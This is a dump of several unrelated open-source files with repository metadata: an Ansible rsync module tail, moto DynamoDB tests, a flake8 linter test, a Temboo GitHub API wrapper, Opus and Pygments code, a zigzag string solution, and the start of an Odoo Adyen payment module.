    ssh_opts = '-S none'
    if not verify_host:
        ssh_opts = '%s -o StrictHostKeyChecking=no' % ssh_opts
    if ssh_args:
        ssh_opts = '%s %s' % (ssh_opts, ssh_args)
    if source.startswith('"rsync://') and dest.startswith('"rsync://'):
        module.fail_json(msg='either src or dest must be a localhost', rc=1)
    if not source.startswith('"rsync://') and not dest.startswith('"rsync://'):
        # If the user specified a port value
        # Note: The action plugin takes care of setting this to a port from
        # inventory if the user didn't specify an explicit dest_port
        if dest_port is not None:
            cmd += " --rsh 'ssh %s %s -o Port=%s'" % (private_key, ssh_opts, dest_port)
        else:
            cmd += " --rsh 'ssh %s %s'" % (private_key, ssh_opts)
    if rsync_path:
        cmd = cmd + " --rsync-path=%s" % (rsync_path)
    if rsync_opts:
        cmd = cmd + " " + " ".join(rsync_opts)
    if partial:
        cmd = cmd + " --partial"
    # rsync emits one itemized line per transferred file; prefix each with a
    # marker so 'changed' can be derived from the presence of any such line.
    changed_marker = '<<CHANGED>>'
    cmd = cmd + " --out-format='" + changed_marker + "%i %n%L'"
    # expand the paths
    if '@' not in source:
        source = os.path.expanduser(source)
    if '@' not in dest:
        dest = os.path.expanduser(dest)
    cmd = ' '.join([cmd, source, dest])
    cmdstr = cmd
    (rc, out, err) = module.run_command(cmd)
    if rc:
        return module.fail_json(msg=err, rc=rc, cmd=cmdstr)
    else:
        changed = changed_marker in out
        out_clean = out.replace(changed_marker, '')
        out_lines = out_clean.split('\n')
        while '' in out_lines:
            out_lines.remove('')
        if module._diff:
            diff = {'prepared': out_clean}
            return module.exit_json(changed=changed, msg=out_clean,
                                    rc=rc, cmd=cmdstr, stdout_lines=out_lines,
                                    diff=diff)
        else:
            return module.exit_json(changed=changed, msg=out_clean,
                                    rc=rc, cmd=cmdstr, stdout_lines=out_lines)
# import module snippets
from ansible.module_utils.basic import *
# Run the module only when executed directly (not when imported).
if __name__ == '__main__':
    main()
|
grimmjow8/ansible
|
lib/ansible/modules/files/synchronize.py
|
Python
|
gpl-3.0
| 18,198
|
from __future__ import unicode_literals
import boto
import boto3
from boto3.dynamodb.conditions import Key
import sure # noqa
from freezegun import freeze_time
from boto.exception import JSONResponseError
from moto import mock_dynamodb2
from tests.helpers import requires_boto_gte
try:
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
from boto.dynamodb2.table import Item
from boto.dynamodb2.exceptions import ConditionalCheckFailedException, ItemNotFound
except ImportError:
pass
def create_table():
    """Create and return the hash-key-only 'messages' table used by these tests."""
    schema = [HashKey('forum_name')]
    throughput = {'read': 10, 'write': 10}
    return Table.create('messages', schema=schema, throughput=throughput)
@requires_boto_gte("2.9")
@mock_dynamodb2
@freeze_time("2012-01-14")
def test_create_table():
    """describe_table should report the full schema of a freshly created table."""
    create_table()
    # Time is frozen, so CreationDateTime is the fixed 2012-01-14 epoch value.
    expected = {
        'Table': {
            'AttributeDefinitions': [
                {'AttributeName': 'forum_name', 'AttributeType': 'S'}
            ],
            'ProvisionedThroughput': {
                'NumberOfDecreasesToday': 0, 'WriteCapacityUnits': 10, 'ReadCapacityUnits': 10
            },
            'TableSizeBytes': 0,
            'TableName': 'messages',
            'TableStatus': 'ACTIVE',
            'KeySchema': [
                {'KeyType': 'HASH', 'AttributeName': 'forum_name'}
            ],
            'ItemCount': 0, 'CreationDateTime': 1326499200.0,
            'GlobalSecondaryIndexes': [],
        }
    }
    conn = boto.dynamodb2.connect_to_region(
        'us-west-2',
        aws_access_key_id="ak",
        aws_secret_access_key="sk"
    )
    conn.describe_table('messages').should.equal(expected)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_table():
    """Deleting a table removes it; deleting again raises JSONResponseError."""
    create_table()
    conn = boto.dynamodb2.layer1.DynamoDBConnection()
    conn.list_tables()["TableNames"].should.have.length_of(1)
    conn.delete_table('messages')
    conn.list_tables()["TableNames"].should.have.length_of(0)
    conn.delete_table.when.called_with('messages').should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_update_table_throughput():
    """Table.update should change the provisioned read/write throughput."""
    table = create_table()
    table.throughput["read"].should.equal(10)
    table.throughput["write"].should.equal(10)
    table.update(throughput={
        'read': 5,
        'write': 6,
    })
    table.throughput["read"].should.equal(5)
    table.throughput["write"].should.equal(6)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_add_and_describe_and_update():
    """put_item/get_item round-trip, then save(overwrite=True) updates a field."""
    table = create_table()
    data = {
        'forum_name': 'LOLCat Forum',
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User A',
    }
    table.put_item(data=data)
    returned_item = table.get_item(forum_name="LOLCat Forum")
    returned_item.should_not.be.none
    dict(returned_item).should.equal({
        'forum_name': 'LOLCat Forum',
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User A',
    })
    # Mutate one attribute and persist; a re-read must observe the change.
    returned_item['SentBy'] = 'User B'
    returned_item.save(overwrite=True)
    returned_item = table.get_item(
        forum_name='LOLCat Forum'
    )
    dict(returned_item).should.equal({
        'forum_name': 'LOLCat Forum',
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User B',
    })
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_item_put_without_table():
    """put_item against an undeclared table raises JSONResponseError."""
    conn = boto.dynamodb2.layer1.DynamoDBConnection()
    conn.put_item.when.called_with(
        table_name='undeclared-table',
        item={
            'forum_name': 'LOLCat Forum',
            'Body': 'http://url_to_lolcat.gif',
            'SentBy': 'User A',
        }
    ).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_item_with_undeclared_table():
    """get_item against an undeclared table raises JSONResponseError."""
    conn = boto.dynamodb2.layer1.DynamoDBConnection()
    conn.get_item.when.called_with(
        table_name='undeclared-table',
        key={"forum_name": {"S": "LOLCat Forum"}},
    ).should.throw(JSONResponseError)
@requires_boto_gte("2.30.0")
@mock_dynamodb2
def test_delete_item():
    """Item.delete removes the row; a second delete reports failure (False)."""
    table = create_table()
    item_data = {
        'forum_name': 'LOLCat Forum',
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User A',
        'ReceivedTime': '12/9/2011 11:36:03 PM',
    }
    item = Item(table, item_data)
    item.save()
    table.count().should.equal(1)
    response = item.delete()
    response.should.equal(True)
    table.count().should.equal(0)
    # Deleting an already-deleted item returns False rather than raising.
    item.delete().should.equal(False)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_delete_item_with_undeclared_table():
    """delete_item against an undeclared table raises JSONResponseError."""
    conn = boto.dynamodb2.layer1.DynamoDBConnection()
    conn.delete_item.when.called_with(
        table_name='undeclared-table',
        key={"forum_name": {"S": "LOLCat Forum"}},
    ).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query():
    """query by hash key returns exactly the single matching item."""
    table = create_table()
    item_data = {
        'forum_name': 'the-key',
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User A',
        'ReceivedTime': '12/9/2011 11:36:03 PM',
    }
    item = Item(table, item_data)
    item.save(overwrite=True)
    table.count().should.equal(1)
    # Re-open the table by name to exercise the lookup path as well.
    table = Table("messages")
    results = table.query(forum_name__eq='the-key')
    sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_query_with_undeclared_table():
    """query against an undeclared table raises JSONResponseError."""
    conn = boto.dynamodb2.layer1.DynamoDBConnection()
    conn.query.when.called_with(
        table_name='undeclared-table',
        key_conditions={"forum_name": {"ComparisonOperator": "EQ", "AttributeValueList": [{"S": "the-key"}]}}
    ).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan():
    """scan supports eq, beginswith, null and between filters over three items."""
    table = create_table()
    item_data = {
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User A',
        'ReceivedTime': '12/9/2011 11:36:03 PM',
    }
    item_data['forum_name'] = 'the-key'
    item = Item(table, item_data)
    item.save()
    item['forum_name'] = 'the-key2'
    item.save(overwrite=True)
    # Third item carries the extra Ids/PK attributes used by the null/between
    # filters below.
    item_data = {
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User B',
        'ReceivedTime': '12/9/2011 11:36:03 PM',
        'Ids': set([1, 2, 3]),
        'PK': 7,
    }
    item_data['forum_name'] = 'the-key3'
    item = Item(table, item_data)
    item.save()
    results = table.scan()
    sum(1 for _ in results).should.equal(3)
    results = table.scan(SentBy__eq='User B')
    sum(1 for _ in results).should.equal(1)
    results = table.scan(Body__beginswith='http')
    sum(1 for _ in results).should.equal(3)
    results = table.scan(Ids__null=False)
    sum(1 for _ in results).should.equal(1)
    results = table.scan(Ids__null=True)
    sum(1 for _ in results).should.equal(2)
    results = table.scan(PK__between=[8, 9])
    sum(1 for _ in results).should.equal(0)
    results = table.scan(PK__between=[5, 8])
    sum(1 for _ in results).should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_scan_with_undeclared_table():
    """scan against an undeclared table raises JSONResponseError."""
    conn = boto.dynamodb2.layer1.DynamoDBConnection()
    conn.scan.when.called_with(
        table_name='undeclared-table',
        scan_filter={
            "SentBy": {
                "AttributeValueList": [{
                    "S": "User B"}
                ],
                "ComparisonOperator": "EQ"
            }
        },
    ).should.throw(JSONResponseError)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_write_batch():
    """batch_write puts two items, then a batched delete removes one of them."""
    table = create_table()
    with table.batch_write() as batch:
        batch.put_item(data={
            'forum_name': 'the-key',
            'subject': '123',
            'Body': 'http://url_to_lolcat.gif',
            'SentBy': 'User A',
            'ReceivedTime': '12/9/2011 11:36:03 PM',
        })
        batch.put_item(data={
            'forum_name': 'the-key2',
            'subject': '789',
            'Body': 'http://url_to_lolcat.gif',
            'SentBy': 'User B',
            'ReceivedTime': '12/9/2011 11:36:03 PM',
        })
    table.count().should.equal(2)
    with table.batch_write() as batch:
        batch.delete_item(
            forum_name='the-key',
            subject='789'
        )
    table.count().should.equal(1)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_batch_read():
    """batch_get returns one item per requested hash key."""
    table = create_table()
    item_data = {
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User A',
        'ReceivedTime': '12/9/2011 11:36:03 PM',
    }
    item_data['forum_name'] = 'the-key1'
    item = Item(table, item_data)
    item.save()
    item = Item(table, item_data)
    item_data['forum_name'] = 'the-key2'
    item.save(overwrite=True)
    item_data = {
        'Body': 'http://url_to_lolcat.gif',
        'SentBy': 'User B',
        'ReceivedTime': '12/9/2011 11:36:03 PM',
        'Ids': set([1, 2, 3]),
        'PK': 7,
    }
    item = Item(table, item_data)
    item_data['forum_name'] = 'another-key'
    item.save(overwrite=True)
    results = table.batch_get(
        keys=[
            {'forum_name': 'the-key1'},
            {'forum_name': 'another-key'},
        ]
    )
    # Iterate through so that batch_item gets called
    count = len([x for x in results])
    count.should.equal(2)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_key_fields():
    """get_key_fields reports the table's hash key name."""
    table = create_table()
    kf = table.get_key_fields()
    kf[0].should.equal('forum_name')
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_missing_item():
    """get_item for an absent key raises ItemNotFound."""
    table = create_table()
    table.get_item.when.called_with(forum_name='missing').should.throw(ItemNotFound)
@requires_boto_gte("2.9")
@mock_dynamodb2
def test_get_special_item():
    """A hash key whose name is not a valid identifier ('date-joined') still
    round-trips via **kwargs expansion."""
    table = Table.create('messages', schema=[
        HashKey('date-joined')
    ], throughput={
        'read': 10,
        'write': 10,
    })
    data = {
        'date-joined': 127549192,
        'SentBy': 'User A',
    }
    table.put_item(data=data)
    returned_item = table.get_item(**{'date-joined': 127549192})
    dict(returned_item).should.equal(data)
@mock_dynamodb2
def test_update_item_remove():
    """update_item with a REMOVE expression drops the named attributes."""
    conn = boto.dynamodb2.connect_to_region("us-west-2")
    table = Table.create('messages', schema=[
        HashKey('username')
    ])
    data = {
        'username': "steve",
        'SentBy': 'User A',
        'SentTo': 'User B',
    }
    table.put_item(data=data)
    key_map = {
        "S": "steve"
    }
    # Then remove the SentBy field
    conn.update_item("messages", key_map, update_expression="REMOVE :SentBy, :SentTo")
    returned_item = table.get_item(username="steve")
    dict(returned_item).should.equal({
        'username': "steve",
    })
@mock_dynamodb2
def test_update_item_set():
    """update_item with SET adds attributes and REMOVE drops one, in one call."""
    conn = boto.dynamodb2.connect_to_region("us-west-2")
    table = Table.create('messages', schema=[
        HashKey('username')
    ])
    data = {
        'username': "steve",
        'SentBy': 'User A',
    }
    table.put_item(data=data)
    key_map = {
        "S": "steve"
    }
    conn.update_item("messages", key_map, update_expression="SET foo=:bar, blah=:baz REMOVE :SentBy")
    returned_item = table.get_item(username="steve")
    dict(returned_item).should.equal({
        'username': "steve",
        'foo': 'bar',
        'blah': 'baz',
    })
@mock_dynamodb2
def test_failed_overwrite():
    """put_item without overwrite=True raises when the key already exists."""
    table = Table.create('messages', schema=[
        HashKey('id'),
    ], throughput={
        'read': 7,
        'write': 3,
    })
    data1 = {'id': '123', 'data': '678'}
    table.put_item(data=data1)
    data2 = {'id': '123', 'data': '345'}
    table.put_item(data=data2, overwrite=True)
    data3 = {'id': '123', 'data': '812'}
    table.put_item.when.called_with(data=data3).should.throw(ConditionalCheckFailedException)
    # The rejected write must not have clobbered the previous value.
    returned_item = table.lookup('123')
    dict(returned_item).should.equal(data2)
    data4 = {'id': '124', 'data': 812}
    table.put_item(data=data4)
    returned_item = table.lookup('124')
    dict(returned_item).should.equal(data4)
@mock_dynamodb2
def test_conflicting_writes():
    """A stale Item.save (lost optimistic lock) raises ConditionalCheckFailedException."""
    table = Table.create('messages', schema=[
        HashKey('id'),
    ])
    item_data = {'id': '123', 'data': '678'}
    item1 = Item(table, item_data)
    item2 = Item(table, item_data)
    item1.save()
    # item1 wins the second write; item2 still holds the original snapshot.
    item1['data'] = '579'
    item2['data'] = '912'
    item1.save()
    item2.save.when.called_with().should.throw(ConditionalCheckFailedException)
"""
boto3
"""
@mock_dynamodb2
def test_boto3_conditions():
    """boto3 resource API: query with a Key condition returns only the match."""
    dynamodb = boto3.resource('dynamodb', region_name='us-east-1')
    # Create the DynamoDB table.
    table = dynamodb.create_table(
        TableName='users',
        KeySchema=[
            {
                'AttributeName': 'username',
                'KeyType': 'HASH'
            },
        ],
        AttributeDefinitions=[
            {
                'AttributeName': 'username',
                'AttributeType': 'S'
            },
        ],
        ProvisionedThroughput={
            'ReadCapacityUnits': 5,
            'WriteCapacityUnits': 5
        }
    )
    table = dynamodb.Table('users')
    table.put_item(Item={'username': 'johndoe'})
    table.put_item(Item={'username': 'janedoe'})
    response = table.query(
        KeyConditionExpression=Key('username').eq('johndoe')
    )
    response['Count'].should.equal(1)
    response['Items'].should.have.length_of(1)
    response['Items'][0].should.equal({"username": "johndoe"})
|
rouge8/moto
|
tests/test_dynamodb2/test_dynamodb_table_without_range_key.py
|
Python
|
apache-2.0
| 13,379
|
import ast
import os
import pytest
from flake8_import_order import pylama_linter
from tests.utils import extract_expected_errors
def load_test_cases():
    """Collect (path, expected_codes, expected_messages) for every test_cases/*.py.

    The expected errors are parsed out of special comments in each test-case
    file by extract_expected_errors.
    """
    base_path = os.path.dirname(__file__)
    test_case_path = os.path.join(base_path, "test_cases")
    test_case_files = os.listdir(test_case_path)
    test_cases = []
    for fname in test_case_files:
        if not fname.endswith(".py"):
            continue
        fullpath = os.path.join(test_case_path, fname)
        # Use a context manager so the handle is closed deterministically
        # (the original leaked the file object returned by open()).
        with open(fullpath) as handle:
            data = handle.read()
        codes, messages = extract_expected_errors(data)
        test_cases.append((fullpath, codes, messages))
    return test_cases
@pytest.mark.parametrize(
    "filename, expected_codes, expected_messages",
    load_test_cases()
)
def test_expected_error(filename, expected_codes, expected_messages):
    """Lint one test-case file and compare the emitted codes and messages."""
    checker = pylama_linter.Linter()
    assert checker.allow(filename)
    codes = []
    messages = []
    options = {
        "application_import_names": ["flake8_import_order", "tests"],
        "application_package_names": ["local_package"],
    }
    # Choose the import-order style from the test-case filename, if it
    # mentions one of the known styles.
    for style in ['google', 'smarkets', 'pep8']:
        if style in filename:
            options['import_order_style'] = style
            break
    for error in checker.run(filename, **options):
        codes.append(error['type'])
        messages.append(error['text'])
    assert codes == expected_codes
    # Expected messages need only be a subset of the emitted ones.
    assert set(messages) >= set(expected_messages)
|
jhuttner/flake8-import-order
|
tests/test_pylama_linter.py
|
Python
|
lgpl-3.0
| 1,440
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ListYourRepos
# Retrieves a list of repositories for the authenticated user.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListYourRepos(Choreography):
    """Choreo wrapper: list repositories for the authenticated GitHub user.

    NOTE(review): this looks like Temboo-generated boilerplate; keep edits
    consistent with the generator's conventions.
    """
    def __init__(self, temboo_session):
        """
        Create a new instance of the ListYourRepos Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(ListYourRepos, self).__init__(temboo_session, '/Library/GitHub/ReposAPI/Repos/ListYourRepos')
    def new_input_set(self):
        # Factory for the Choreo-specific input set.
        return ListYourReposInputSet()
    def _make_result_set(self, result, path):
        # Factory for the Choreo-specific result set.
        return ListYourReposResultSet(result, path)
    def _make_execution(self, session, exec_id, path):
        # Factory for the Choreo-specific execution handle.
        return ListYourReposChoreographyExecution(session, exec_id, path)
class ListYourReposInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the ListYourRepos
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """
    # One setter per Choreo input; each simply records the value under the
    # input's name via InputSet._set_input.
    def set_AccessToken(self, value):
        """
        Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
        """
        super(ListYourReposInputSet, self)._set_input('AccessToken', value)
    def set_Direction(self, value):
        """
        Set the value of the Direction input for this Choreo. ((optional, string) Valid values are asc or desc. Default behavior is desc unless sorting by full_name in which case, the direction is asc.)
        """
        super(ListYourReposInputSet, self)._set_input('Direction', value)
    def set_Page(self, value):
        """
        Set the value of the Page input for this Choreo. ((optional, integer) Indicates the page index that you want to retrieve. This is used to page through many results. Defaults to 1.)
        """
        super(ListYourReposInputSet, self)._set_input('Page', value)
    def set_Sort(self, value):
        """
        Set the value of the Sort input for this Choreo. ((optional, string) The sort order of the results. Valid values are: created, updated, pushed, or full_name (the default).)
        """
        super(ListYourReposInputSet, self)._set_input('Sort', value)
    def set_Type(self, value):
        """
        Set the value of the Type input for this Choreo. ((optional, string) The type of repos to return. Valid values are: all (the default), owner, public, private, or member.)
        """
        super(ListYourReposInputSet, self)._set_input('Type', value)
class ListYourReposResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the ListYourRepos Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        # NOTE(review): parameter name shadows the builtin 'str'; left as-is
        # because external callers may pass it by keyword.
        return json.loads(str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from GitHub.)
        """
        return self._output.get('Response', None)
    def get_LastPage(self):
        """
        Retrieve the value for the "LastPage" output from this Choreo execution. ((integer) If multiple pages are available for the response, this contains the last available page.)
        """
        return self._output.get('LastPage', None)
    def get_Limit(self):
        """
        Retrieve the value for the "Limit" output from this Choreo execution. ((integer) The available rate limit for your account. This is returned in the GitHub response header.)
        """
        return self._output.get('Limit', None)
    def get_NextPage(self):
        """
        Retrieve the value for the "NextPage" output from this Choreo execution. ((integer) If multiple pages are available for the response, this contains the next page that you should retrieve.)
        """
        return self._output.get('NextPage', None)
    def get_Remaining(self):
        """
        Retrieve the value for the "Remaining" output from this Choreo execution. ((integer) The remaining number of API requests available to you. This is returned in the GitHub response header.)
        """
        return self._output.get('Remaining', None)
class ListYourReposChoreographyExecution(ChoreographyExecution):
    """Execution handle for an asynchronous ListYourRepos Choreo run."""
    def _make_result_set(self, response, path):
        # Wrap the raw execution response in the Choreo-specific result set.
        return ListYourReposResultSet(response, path)
|
willprice/arduino-sphere-project
|
scripts/example_direction_finder/temboo/Library/GitHub/ReposAPI/Repos/ListYourRepos.py
|
Python
|
gpl-2.0
| 5,378
|
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.configuration import Configuration
from opus_core.session_configuration import SessionConfiguration
class Resources(Configuration):
    """In addition to everything in GeneralResources it has an access to SessionConfiguration."""
    def __init__(self, data=None):
        """The argument 'data' is a python native dictionary (class 'dict').

        The default is None instead of a mutable {} literal so that the same
        dict object is not shared between every call relying on the default
        (the classic mutable-default-argument bug in the original).
        """
        if data is None:
            data = {}
        Configuration.__init__(self, data)
    def __getitem__(self, key):
        """First check for key in my configuration; then check in Session configuration"""
        try:
            return Configuration.__getitem__(self, key)
        except KeyError:
            # Fall back to the dataset pool of the global session.
            return SessionConfiguration().get_dataset_from_pool(key)
    def is_in(self, key):
        """Return True if 'key' is in the dictionary or session configuration, otherwise False.
        """
        return (self.has_key(key) or SessionConfiguration().has_key(key))
    def copy(self):
        """Return a new Resources object with this object's entries merged in."""
        c = Resources()
        c.merge(self)
        return c
# Functions
############
def merge_resources_if_not_None(resources=None, pairs=[]):
    """Wrapper for the method merge_if_not_None.

    'resources' may be None, a plain dict or a Resources instance; 'pairs'
    is a list of (key, value) tuples.
    """
    # NOTE(review): any dict input (presumably including Resources itself,
    # since it exposes has_key) is re-wrapped into a fresh Resources object,
    # so the caller's object is never mutated here -- confirm this rewrap is
    # intended before restructuring the two isinstance checks.
    if isinstance(resources, dict):
        resources = Resources(resources)
    if not isinstance(resources, Resources):
        resources = Resources()
    return resources.merge_if_not_None(pairs_to_dict(pairs))
def merge_resources_with_defaults(resources=None, pairs=[]):
    """Wrapper for the method merge_with_defaults.

    'pairs' is a list of (key, value) tuples; presumably they act as default
    values (see Configuration.merge_with_defaults for the exact semantics).
    """
    # Same normalisation/rewrap behavior as merge_resources_if_not_None.
    if isinstance(resources, dict):
        resources = Resources(resources)
    if not isinstance(resources, Resources):
        resources = Resources()
    return resources.merge_with_defaults(pairs_to_dict(pairs))
def pairs_to_dict(pairs):
    """Convert a sequence of (key, value) tuples into a dictionary."""
    # Index only the first two elements of each pair, so longer tuples are
    # tolerated exactly as the original index-based loop did.
    return dict((pair[0], pair[1]) for pair in pairs)
|
christianurich/VIBe2UrbanSim
|
3rdparty/opus/src/opus_core/resources.py
|
Python
|
gpl-2.0
| 2,116
|
# -*- coding: utf-8 -*-
"""
pygments.formatters.terminal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for terminal output with ANSI sequences.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
from pygments.console import ansiformat
from pygments.util import get_choice_opt
__all__ = ['TerminalFormatter']
#: Map token types to a tuple of color values for light and dark
#: backgrounds.
#: NOTE(review): names wrapped in '_..._' or '*...*' appear to request
#: underline/bold rendering via pygments.console.ansiformat -- confirm there.
TERMINAL_COLORS = {
    Token:              ('',            ''),
    Whitespace:         ('lightgray',   'darkgray'),
    Comment:            ('lightgray',   'darkgray'),
    Comment.Preproc:    ('teal',        'turquoise'),
    Keyword:            ('darkblue',    'blue'),
    Keyword.Type:       ('teal',        'turquoise'),
    Operator.Word:      ('purple',      'fuchsia'),
    Name.Builtin:       ('teal',        'turquoise'),
    Name.Function:      ('darkgreen',   'green'),
    Name.Namespace:     ('_teal_',      '_turquoise_'),
    Name.Class:         ('_darkgreen_', '_green_'),
    Name.Exception:     ('teal',        'turquoise'),
    Name.Decorator:     ('darkgray',    'lightgray'),
    Name.Variable:      ('darkred',     'red'),
    Name.Constant:      ('darkred',     'red'),
    Name.Attribute:     ('teal',        'turquoise'),
    Name.Tag:           ('blue',        'blue'),
    String:             ('brown',       'brown'),
    Number:             ('darkblue',    'blue'),
    Generic.Deleted:    ('red',         'red'),
    Generic.Inserted:   ('darkgreen',   'green'),
    Generic.Heading:    ('**',          '**'),
    Generic.Subheading: ('*purple*',    '*fuchsia*'),
    Generic.Error:      ('red',         'red'),
    Error:              ('_red_',       '_red_'),
}
class TerminalFormatter(Formatter):
    r"""
    Format tokens with ANSI color sequences, for output in a text console.
    Color sequences are terminated at newlines, so that paging the output
    works correctly.
    The `get_style_defs()` method doesn't do anything special since there is
    no support for common styles.
    Options accepted:
    `bg`
        Set to ``"light"`` or ``"dark"`` depending on the terminal's background
        (default: ``"light"``).
    `colorscheme`
        A dictionary mapping token types to (lightbg, darkbg) color names or
        ``None`` (default: ``None`` = use builtin colorscheme).
    """
    name = 'Terminal'
    aliases = ['terminal', 'console']
    filenames = []
    def __init__(self, **options):
        Formatter.__init__(self, **options)
        # darkbg (0/1 via bool) indexes the (light, dark) color pairs below.
        self.darkbg = get_choice_opt(options, 'bg',
                                     ['light', 'dark'], 'light') == 'dark'
        self.colorscheme = options.get('colorscheme', None) or TERMINAL_COLORS
    def format(self, tokensource, outfile):
        # hack: if the output is a terminal and has an encoding set,
        # use that to avoid unicode encode problems
        if not self.encoding and hasattr(outfile, "encoding") and \
           hasattr(outfile, "isatty") and outfile.isatty() and \
           sys.version_info < (3,):
            self.encoding = outfile.encoding
        return Formatter.format(self, tokensource, outfile)
    def format_unencoded(self, tokensource, outfile):
        for ttype, value in tokensource:
            # Walk up the token hierarchy until a mapped color is found; the
            # scheme is expected to map the root Token type (as the builtin
            # scheme does), which terminates the walk.
            color = self.colorscheme.get(ttype)
            while color is None:
                ttype = ttype[:-1]
                color = self.colorscheme.get(ttype)
            if color:
                color = color[self.darkbg]
                # Emit line by line so the color sequence restarts after each
                # newline (keeps pagers working correctly).
                spl = value.split('\n')
                for line in spl[:-1]:
                    if line:
                        outfile.write(ansiformat(color, line))
                    outfile.write('\n')
                if spl[-1]:
                    outfile.write(ansiformat(color, spl[-1]))
            else:
                outfile.write(value)
|
kirbyfan64/pygments-unofficial
|
pygments/formatters/terminal.py
|
Python
|
bsd-2-clause
| 4,065
|
class Solution(object):
    def convert(self, s, numRows):
        """Read *s* row-by-row from its zigzag layout with numRows rows.

        :type s: str
        :type numRows: int
        :rtype: str
        """
        if len(s) < 2 or numRows == 1:
            return s
        # Simulate the zigzag walk: bounce the current row index between the
        # top and bottom rows, appending each character to its row, then
        # concatenate the rows top-to-bottom.  (Assumes numRows >= 1.)
        rows = [[] for _ in range(numRows)]
        row, step = 0, 1
        for ch in s:
            rows[row].append(ch)
            if row == 0:
                step = 1
            elif row == numRows - 1:
                step = -1
            row += step
        return "".join("".join(r) for r in rows)
|
taulk/oj
|
LeetCode/[6]zigzag-conversion/Solution.py
|
Python
|
unlicense
| 585
|
# -*- coding: utf-'8' "-*-"
import base64
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
_inherit = 'payment.acquirer'
def _get_adyen_urls(self, cr, uid, environment, context=None):
""" Adyen URLs
- yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
"""
return {
'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % ('live' if environment == 'prod' else environment),
}
def _get_providers(self, cr, uid, context=None):
providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
providers.append(['adyen', 'Adyen'])
return providers
_columns = {
'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
}
def _adyen_generate_merchant_sig(self, acquirer, inout, values):
""" Generate the shasign for incoming or outgoing communications.
:param browse acquirer: the payment.acquirer browse record. It should
have a shakey in shaky out
:param string inout: 'in' (openerp contacting ogone) or 'out' (adyen
contacting openerp). In this last case only some
fields should be contained (see e-Commerce basic)
:param dict values: transaction values
:return string: shasign
"""
assert inout in ('in', 'out')
assert acquirer.provider == 'adyen'
if inout == 'in':
keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
else:
keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()
def get_value(key):
if values.get(key):
return values[key]
return ''
sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
key = acquirer.adyen_skin_hmac_key.encode('ascii')
return base64.b64encode(hmac.new(key, sign, sha1).digest())
def adyen_form_generate_values(self, cr, uid, id, values, context=None):
    """Populate ``values`` with the fields posted to the Adyen HPP form.

    Adds merchant/skin identifiers, the amount in minor units, the return
    URL and (last) the computed ``merchantSig``; returns the dict.
    """
    base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
